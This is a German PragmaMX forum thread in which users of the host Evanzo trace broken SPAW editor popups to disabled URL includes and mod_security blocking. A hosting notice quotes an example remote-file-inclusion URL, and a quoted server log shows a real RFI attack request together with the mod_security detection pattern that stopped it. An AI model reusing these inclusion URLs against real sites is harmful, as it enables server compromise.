Suche

[tuxxi]

Hallo zusammen...

nachdem unser Server letzten Montag gehackt worden ist, musste ich einen kompletten Restore machen.

Es funktioniert auch alles wieder soweit, nur wenn ich einen Artikel erstellen möchte, und z.B. ein Bild einfüge, erscheint in einem PopUp nachfolgende Meldung:

******
Zugriff nicht möglich!

Der Server ist derzeit nicht in der Lage die Anfrage zu bearbeiten. Entweder ist der Server derzeit überlastet oder wegen Wartungsarbeiten nicht verfügbar. Bitte versuchen Sie es später wieder.

Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.
******

Das ganze ist Browserunabhängig und auch die einzelnen Dateirechte sind richtig gesetzt. Der Pfad in der conf ist ebenfalls korrekt.

Habe die Seite von meinem Testserver auf den Live-Server bei Evanzo hochkopiert, lokal funktioniert alles, nur eben nicht auf dem Live-Server. Das Spaw-Verzeichnis habe ich ebenfalls noch mal einzeln hochkopiert, keine Änderung.

Irgend jemand vielleicht ne Idee???

Schönen Dank und Gruß
Stephan

[Andi]

Hi

ist das noch aktuell?
Auf deiner Seite kann ich im /spaw/ Ordner alle Dateien ganz normal aufrufen...

[Oscar]

Blick es auch nich 


habe den code übernommen, kriege aber nur diese meldung!

Parse error: parse error, unexpected '.' in C:\Programme\xampp\htdocs\pragma\modules\editortest\index.php on line 34

könnte jemand eventuell eine kleine index zeigen. wie es richtig sein muß?

oder liegt es daran, das es im xampp liegt?

gruß
Oscar

[tuxxi]

hi andy,

sorry das ich jetzt erst antworte...

jepp, ist noch aktuell...  habe nicht dran gedacht, die richtige webseite anzugeben.. schande über mich..

http://www.smartfriends.de   

ich habe dort ein komplett neues pragmamx in einem anderen verzeichnis installiert, der gleiche fehler.

wenn ich eine url eingeben will, geht zwar das kleine popup auf, jedoch steht da eben der madige text drin.. von wegen server überlastung...

auf der seite von evanzo habe ich den hinweis gefunden, das die das aufrufen fremder seiteninhalte per php unterbunden haben.

denke, das wird wohl damit zusammenhängen...  datenbank habe ich auch schon alles neu eingerichtet, gleiches resultat...

vorallem funktioniert das ganze ja auf meinem eigenen rootserver einwandfrei  http://smaf.madserver.de

denke, ich werd unsere smartclub seite umziehen...  morgen nochmal bei evanzo anrufen und sehen, was die da machen können.

werde es dann hier auf jeden fall posten.

schönen gruß
stephan

[jubilee]

@Oscar:

habe den code übernommen, kriege aber nur diese meldung!
Parse error: parse error, unexpected '.' in C:\Programme\xampp\htdocs\pragma\modules\editortest\index.php on line 34
könnte jemand eventuell eine kleine index zeigen. wie es richtig sein muß?

Poste doch bitte die Zeilen 30-35 aus der
C:\Programme\xampp\htdocs\pragma\modules\editortest\index.php

[Okimen]

Hallo,
also nachdem ich einige freundliche Hinweise (Versionsüberwachung) bekommen habe, so kann ich seit einiger Zeit sagen, ich habe demnach eine funktionierende 0.1.9 Version auf meinem Server!

Wollte jetzt wiederholt einige neue Artikel schreiben, musste dann leider feststellen, das es weder möglich ist Bilder einzufügen, noch die Textfarbe zu ändern, oder so!

Bekomme dann immer nur folgende Fehlermeldung:

Zugriff nicht möglich!

Der Server ist derzeit nicht in der Lage die Anfrage zu bearbeiten. Entweder ist der Server derzeit überlastet oder wegen Wartungsarbeiten nicht verfügbar. Bitte versuchen Sie es später wieder.

Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.
Error 503
www.diweweb.de
Tue Feb 13 20:37:56 2007
Apache

Laut meinem Hoster (Evanzo) ist auf dem Server alles in Ordnung!

Hat jemend ne Idee woran es liegen könnte. Meine vorher ging es ja, habe auf meinem Server (www.diweweb.de) ja schon einige Artikel veröffentlicht, die soweit in Ordnung sind!

Falls notwendig, stelle ich dem PragmaMX Support Team natürlich auch gerne die Admin Daten per PM zur Verfügung!

MfG
Dirk

[Andi]

@ Oskar

Was hat das mit dem ursprünglichen Thema zu tun? 
http://www.pragmamx.org/Content-pa-showpage-pid-48.html#brule_6

Mach nen neuen Thread dazu auf

[Andi]

Moin

Stichwort Evanzo:
http://www.pragmamx.org/forum-topic-20286.0.html
gleiches Problem....

Laut meinem Hoster (Evanzo) ist auf dem Server alles in Ordnung!

Mit Sicherheit nicht

[Okimen]

Moin Andi,
vielen Dank.

Nur so richtig verstanden habe ich das nicht wirklich denke ich. Zumal ja vorher noch alles in Ordnung war!
Habe mich dort natürlich auch an das Support-Team gewendet, mit folgender Antwort bin ich dann abgespeist worden.

--------------------------------------------------------------------------------------------------------------
Sehr geehrter Herr Werner,
Vielen Dank fur Ihre Mail.
Unsere Technikabteilung hat Ihre Anfrage fuer Sie geprueft und der Fehler muesste eigentlich behoben sein.

Bitte pruefen Sie auch selber und wenn Sie weitere Fehler bemerken sollten bitte um eine kurtze Rückmeldung.

Für weitere Fragen steht Ihnen unser Supportteam immer gern zur Verfügung.
........................................................................
WICHTIG - Zuweisung des Supportpasswortes unter http://support.evanzo.net per Login in den persoenlichen Kundenbereich (Kunden-)Daten >> aendern.
.........................................................................
Mit freundlichen Gruessen
Ihre Support-Abteilung
Alexander Cusmaru
-----------------------------------------------------------------------

Also wohl nix mit günstigem Hoster, ist wohl noch zu teuer wenn die Leistung nicht stimmt!

LG
Dirk

[Andi]

Hi

da würde ich nochmal nachfragen. Wenn der Spaw vorher lief, und jetzt nicht mehr, dann liegt das nicht am Spaw. Solche Veränderungen können, egal was, nur von der Serverseite her kommen...

Tuxxi schreibt ja in seinem Post auch:

nachdem unser Server letzten Montag gehackt worden ist....
.....
auf der seite von evanzo habe ich den hinweis gefunden, das die das aufrufen fremder seiteninhalte per php unterbunden haben.

denke, das wird wohl damit zusammenhängen...

[tuxxi]

So, einige Telefonate mit Evanzo später bin ich noch genauso schlau :-)

Der Techniker will sich bei mir melden und ich habe auch auf den anderen Thread hingewiesen, wo ja augenscheinlich das gleiche Problem vorliegt.

Hoffe, ich erfahre bald genaueres... scheint aber wohl eine serverseitige Sache zu sein - hoffe, die haben da eine Lösung....

Gruß Stephan

[Okimen]

Hallo,
der vollständigkeit halber poste ich hier mal die Antwort von Evanzo!

########################################################################

Sehr geehrter Herr Werner,

Vielen Dank fur die ausfuehrliche Beschreibung Ihres Problems und fuer die Mitteilung der Zugangsdaten.

Wir haben Ihren Auftrag an die Technikabteilung zur Bearbeitung weitergeleitet.

Ihr Auftrag wird schnellstmöglich bearbeitet und Sie erhalten Informationen an die angegebene eMailadresse.

Für Rückfragen stehen wir Ihnen immer gerne zur Verfügung.
........................................................................
WICHTIG - Zuweisung des Supportpasswortes unter http://support.evanzo.net per Login in den persoenlichen Kundenbereich (Kunden-)Daten >> aendern.
.........................................................................
Mit freundlichen Gruessen
Ihre Support-Abteilung
Alexander Cusmaru

evanzo e-commerce GmbH - Postfach 544 - D-27498 Helgoland
Tel: 01805 013310* - Fax 01805 013311* (* 14 Cent/Min)

Kostenpflichtiger Telefonsupport Mo-Fr 10-18 Uhr 0900 - 580 59 203 (1,99 Euro/min)

Email support@evanzo.net - Web http://www.evanzo.net -

Geschaeftsfuehrer: Andreas Buis u. Stefan Pfeifer Eingetragen beim Amtsgericht Bremen  unter HRB 19591 Zuständiges Finanzamt Pinneberg
Steuernummer: DE211161668

evanzo ® ist beim Deutschen Patentamt als geschuetzte Marke eingetragen. Alle Rechte liegen bei der evanzo e-commerce GmbH


*****************************************************************
Fuer nicht im Tarif enthaltenen erweiterten Support empfehlen wir
               http://www.premiumsupport24.de
moderne Soforthilfe per  Internet auf  Ihrem PC vom Spezialisten
           Hilfe und Beratung fuer jedes Problem.
###########################################################################

LG
Dirk

[tuxxi]

so, bis jetzt nix neues.. habe einer netten dame am telefon genau erklärt und auf der seite gezeigt, wo es hapert...  nen techniker bekommt man anscheinend da nicht direkt ans telefon, ausser über ne 0900er leitung.. toll...

naja, nu wart ich mal, was die da machen, die nette dame war sehr zuversichtlich

auf jedenfall habe ich einfliessen lassen, das es nicht nur unsere seite betrifft, sondern alle, die pragmamx auf den servern von evanzo einsetzen...

vielleicht bringts ja was...  zumindest war die dame sehr freundlich 

sowie es was neues gibt, werd ich berichten..

gruß stephan

[anauko]

Tja, hier die Mitteilung von Evanzo im Kundenbereich:
2007-02-05 17:43:33:
Sicherheitshinweis: PHP Includes

Das Nachladen von PHP Code aus externen Seiten per http und ftp wurde deaktiviert.

Der Aufruf der URL
http://meinedomain.de/index.php?page=http://meinedomain.de/inhalt.php funktioniert nicht, aber
http://meinedomain.de/index.php?page=inhalt.php funktioniert.

Diese Änderung wurde nötig, da sich leider Angreifer genau diese Lücke zu nutze machen können, um den Server und/oder Ihre Webseite zu schädigen.
z.B. so:
http://meinedomain.de/index.php?page=http://angreiferdomain.de/schadcode.php


Wenn Sie aus bestimmten Gründen einen PHP Include von externem Code benötigen, schreiben Sie bitte an unseren Support.

Alles Klar!? Also an den Support schreiben oder den Provider wechseln oder.....
Frage gibt es eine andere Lösung diese Krux zu umgehen?

[Andi]

Hi

oki, die haben allow_urlfopen abgeschaltet...
Das ist richtig so, weil es in schrottigen Scripten eine grosse Sicherheitslücke darstellt.

Im pragmaMx wird aber nichts über solche URL's "nachgeladen". Auch nicht im Spaw. Damit hat es also direkt nichts zu tun.

Es gab in alten Versionen des (standallone) Spaw eine Lücke, die genau dieses problem ausnutzte. Vielleicht haben die Jungs noch zusätzlich was eingebaut, die den Spaw im pragmaMx blockiert....


PS:
Ich verbinde jetzt mal die beiden Threads.

[tuxxi]

so, etliche telefonate später wurde mir nun von den netten ma im callcenter wiederholt gesagt, die technik hätte das problem bereits glöst...

tja, bin dann mit dem ma zum wiederholten male auf der seite das problem durchgegangen und oh wunder..  es besteht immer noch...

naja, immerhin will er jetzt in der technik druck machen...

fazit, wenn die das weiterhin so handhaben, geht am montag die kündigung und nen kk hin...

gruß stephan

[Okimen]

Hallo Stephan,

kann ich gut nachvollziehen.
Bin zwar nicht grad der größte was den Umgang mit pragmaMX angeht, denke aber auf ein Super Support-Team bei PragmaMX und viele viele hilfsbereite und helfende User zurückgreifen zu können.
Aber was Evanzo angeht, da kommt man sich langsam wirklich verar... ähh verkohlt vor.
Werde mich deinem Entschluss wohl anschließen.

LG
Dirk

PS: Schönes Wochenende!!!

[tuxxi]

Hi Dirk..

jepp, sind da echte Helden...

Eben nach Hause gekommen und natürlich gleich geschaut, ob sich etwas getan hat...

ES HAT...  zumindest wenn ich die Seite mit dem Firefox öffne, kommt wieder das kleine Fenster, in dem man die Url etc. einfügen kann, bei IE nach wie vor die Fehlermeldung...

Email wie gewünscht ist auch noch keine gekommen...  werde also am Montag mal wieder zum Telefonhörer greifen...

Allen noch ein schönes WE
Stephan

[tuxxi]

tja, was immer die da auch machen.. wollte heute morgen nen artikel einstellen, wieder keine funktion, auf direkt eingegebener html-code (<a href="...) wird nicht angezeigt...

Fehlerseite wieder bei jedem Browser, auch beim Firefox...

[trulla]

Ich hab die gleichen Probleme! Vielleicht sollten wir uns zusamm tun und eine Petition einreichen

[tuxxi]

denke mal, jeder der dieses cms einsetzt und bei evanzo den webspace hat, wird dieselben probs haben...

habe das ja dort auch mehrfach angesprochen, trotzdem hiess es beim nächsten anruf immer erstmal, die technik hat das prob behoben...

wenn die mich wenigstens mal mit einem ihrer techniker verbinden würden...  aber egal wann ich da anrufe.. die techniker sind immer grad im gespräch...   wundert mich dann auch nicht mehr wirklich, wenn die nicht in der lage sind, dieses hausgemachte problem zufriedenstellend zu lösen...

dumm nur, das sich ja cms-systeme immer mehr durchsetzen, aber die gehen da wohl nur nach dem, was sie selber als vorkonfiguriert anbieten, unter anderem auch typo3...

naja.. morgen ist montag..  ein guter tag zum telefonieren 

[breakdancer]

Sodele und hallo,

auch ich habe meinen Webspace bei Evanzo und auch bei mir das Gleiche Problem...

Nach dem Lesen dieses wahnsinns-Threads und auch bereits einiger einschlägiger Erfahrungen mit Levanzo und deren manchmal etwas - sagen wir mal - schleichenden Support-Verhaltens habe ich heute mal ein entsprechendes Schreiben aufgesetzt...

Den Inhalt darf ich leider nicht hier reinsetzen, Evanzo stuft das als vertraulich ein und verbietet die Publizierung.

Nur so viel: Da ich einen guten Bekannten hier bei 1 & 1 direkt im Ort habe und dort auch meine Internet-Flatrate fahre, würde mir der Wechsel nicht schwerfallen. Auch wenns ein bisschen teurer würde...

Ich hoffe, die Leute von Evanzo lesen endlich auch mal hier mit :-)

Gruss

Markus

[xerraxde]

Also mal ganz ehrlich Leute, was habt ihr bei dem Webauftritt von Evanzo und deren Preise erwartet? 

[tuxxi]

sorry xeraxxde, aber die aussage ist doch ein wenig schwach.

egal wieviel geld ich auch bezahle, bei unserer clubwebseite haben wir das powerweb mit einer laufzeit von 3 jahren abgeschlossen, so erwarte ich doch von einem anbieter, das er wenigstens seine technik und seine server beherrscht.

ich rege mich auch gar nicht so sehr darüber auf, das da einige funktionen nicht gehen sondern vielmehr über die art und weise, wie damit umgegangen wird.

und das findest du ziemlich oft und auch unabhängig von dem was du bezahlst.

bis zu der umstellung bei denen hat auch alles einwandfrei funktioniert und wenn ich da für weniger geld das bekomme, was mir reicht, warum soll ich dann mehr ausgeben.

schönen gruß stephan

[xerraxde]

Servicewüste Deutschland kann man da nur sagen. Ich hatte meinen Server früher bei Server4You und die waren auch nicht besser drauf, haben mir für alles mögliche Rechnungen geschickt, haben meinen Server manchmal einfach abgeschaltet und zum Schluss ging dann auch noch alle meine Daten flöten.

Nun habe ich einen Anbieter in den USA und bezahle für 10GB Platz und 100GB Traffic (Inklusive Domain und allen anderen SchnickSchnack) 4.99Dollar/Monat das sind 3.80€/Monat und das alles auch noch ohne Kreditkarte oder Lastschriftverfahren sondern über Paypal.

Ich habe 24Stunden Live-Ticket-Support. Bin echt begeistert und frage mich andauernd wieso ich nicht früher gewechselt habe. 

[tuxxi]

jepp, da hast recht...

habe meinen eigenen rootserver bei netdirekt, zahle da 15 € /monat, aber super erreichbarkeit, sehr guter support und wenn es mal irgendwo klemmt, bekommst wenigstens auch einen von der technik ans telefon.

[Andi]

Stop!

Wenn das jetzt in eine "ich hab den besten Anbieter" Diskussion abgleitet, schliesse ich den Thread.

[HdH]

Mhh, habe auch ein Projekt bei Evanzo, no Probleme mit Spaw...

MfG Peter

[tuxxi]

hi peter,

habe mich grade auf deine hdh seite angemeldet...  bei dir geht es alles...

was hast du denn für ein packet bei evanzo???  wir haben das powerweb und da funzt es mittlerweile mal wieder nur mit dem firefox, mit dem ie geht nix...  mit dem firefox geht es auch nur, wenn du nicht angemeldet bist....

gruß stephan

[HdH]

Mhh, Paket? muss ich erst mal überlegen, ist ein uralt-Paket von vor 4 Jahren (4 Euro- Monat), gibt es mittlerweile nicht mehr... In etwa dürfte das Angebot von jetzt 5 Euro passen...
Ich denke mal, das es an den Server liegt, auf dem Dein Web gehostet ist, das dort nach dem Hack speziell was nicht mehr passt. Mein Web liegt sicher auf einen anderen Server...

MfG Peter

[tuxxi]

könntest recht haben..  sollten die aber doch in den griff bekommen...

ist des ok, wenn ich auf deine hdh-seite verweise???  vielleicht hilfts denen ja...

gruß stephan

[HdH]

Da habe ich kein Problem mit, ist OK...

MfG Peter

[tuxxi]

super, danke dir...

wird von meiner seite aus der letzte versuch...  habe das ganze bei uns im club angebracht mit dem vorschlag, die seite auf meinen server umzuziehen... wurde dankend abgelehnt...

wenn ich überlege, was ich in der letzten woche da rumgemacht habe...

aber egal, wenn sie nicht wollen...  ich pflege in solchen situationen immer zu sagen... meine webseite funktioniert

schönen gruß...
stephan

[Okimen]

Hallo,
dachte eigentlich, das meine "Problemchen" durch einen KK Antrag und die Kündigung bei Evanzo gelöst wären.
Heute habe ich die anschließende Mail erhalten, wo meine Kündigung bedauert wird bla bla.
Dazu haben Sie dann geschrieben, das einige Angriffe auf mein verwendetes CMS stattgefunden haben sollen.
Ich kann damit wenig anfangen, aber vielleicht kann mir ja einer vom PragmaMX Support Team sagen was dar dran ist, und was ich davon halten soll.
Ach, schaut am besten selber!
--------------------------------------------------------------------------------------------------------------------------------
Sehr geehrter Herr Werner,

wir bedauern Ihren Entschluss zu kündigen.

Sollten Sie mit einer Leistung von uns oder mit der Serverperformance etc.
nicht zufrieden sein, können wir sicherlich Abhilfe schaffen.
Beschreiben Sie uns einfach Ihre Problematik an hostmaster@evanzo.net

Kündigungen können wir aus sicherheits- und haftungsrechtlichen Gründen nur schriftlich per Fax oder Postweg mit Ihrer Unterschrift akzeptieren.

Möchten Sie eine Domain auch beim zuständigen NIC löschen lassen, vermerken Sie bitte auf dem Schreiben die Kennung "CLOSE".

Achten sie bitte ggf. auch:

Hier hat jemand versucht Ihre Webseite anzugreifen (siehe ------->> )

==d5a51426==============================
Request: www.diweweb.de 207.155.174.194 - - [18/Nov/2006:15:49:03 +0100] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://cmdx2.by.ru/cmd
.gif? HTTP/1.1" 503 1022 "-" "libwww-perl/5.64" - "-"
Handler: type-map
----------------------------------------

------->>>> GET
------->>>> /modules/My_eGallery/public/displayCategory.php?adminpath=ht
------->>>> tp://cmdx2.by.ru/cmd.gif? HTTP/1.1

Connection: close
Host: www.diweweb.de
User-Agent: libwww-perl/5.64
mod_security-action: 503
mod_security-message: Access denied with code 503. Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\
x20?\\?" at REQUEST_URI [severity "EMERGENCY"]

HTTP/1.1 503 Service Temporarily Unavailable
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
--d5a51426--

Wir haben mehrere Angriffe dieser und anderer Art gegen Ihr CMS system in unseren Logs.

Dass kann auch ein Grund sein warum Ihre Seite nicht richtig funkioniert.

Wir bitten um Verständnis.
-----------------------------------------------------------------------------------------------------------------------------

Nur noch soviel, dass ändert nichts an meinem Entschluss mit dem KK Antrag usw.

Aber vielleicht kann mich ja mal jemand aufklären!

LG
Dirk

[Andi]

Hi

dieser dort aufgeführte Angriff auf eine Nuke-Modul ist schon dermassen alt, da findet man schon gar keine richtigen Informationen auf den einschlägigen SecuritySeiten...
Diese Lücke war in der pragmaMx Version der my-eGallery noch nie vorhanden.

Hier das habe ich noch gefunden:
- http://www.securityfocus.com/bid/9113/exploit
- http://archive.cert.uni-stuttgart.de/bugtraq/2003/12/msg00000.html
- http://www.pragmamx.org/Forum-topic9178.0.html
- http://www.rootforum.de/forum/viewtopic.php?p=137643

Dass kann auch ein Grund sein warum Ihre Seite nicht richtig funkioniert.

Könnte, ist aber in dem Fall Unsinn.

mod_security-action: 503
mod_security-message: Access denied with code 503. Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\
x20?\\?" at REQUEST_URI [severity "EMERGENCY"]
HTTP/1.1 503 Service Temporarily Unavailable

Aha, mod_security....
geile Sache, aber die Konfiguration ist mit Sicherheit die Quelle des Übels. Da hupt bestimmt eine der Einstellungen rum.

[Okimen]

@Andi

Vielen Dank für Deine Antwort und die evtl. damit verbunden Mühe!
Das soll es von meiner Seite auch zum Thema Provider auch gewesen sein!

VG
Dirk

[breakdancer]

na denn...

Hey,

hatte ja auch von meinen Problemen berichtet und dass ich an Evanzo ne entsprechend dringende Anfrage geschrieben habe...

Das Problem wurde innerhalb von 6 Tagen gelöst, wobei die erste Rück-e-Mail von Evanzo drei Tage bei mir wegen Abwesenheit im Postfach lag.

Man hat die Admin-Rechte für mein System angefordert um sich die Module und alles einmal von Userseite anzuschauen. Ich habe dem Supporter einen Super-User-Account angelegt und nach zwei Tagen ist alles wieder gelaufen. Was auch immer Evanzo da serverseitig gemacht hat: Danke dafür !

Muss an dieser Stelle auch mal gesagt werden...

Lieben Gruss

Markus

[Okimen]

Ja ok,
genau das selbe durfte ich auch erleben.
Allerdings denke ich trotzdem dass mein Entschluss der richtige war!

VG Dirk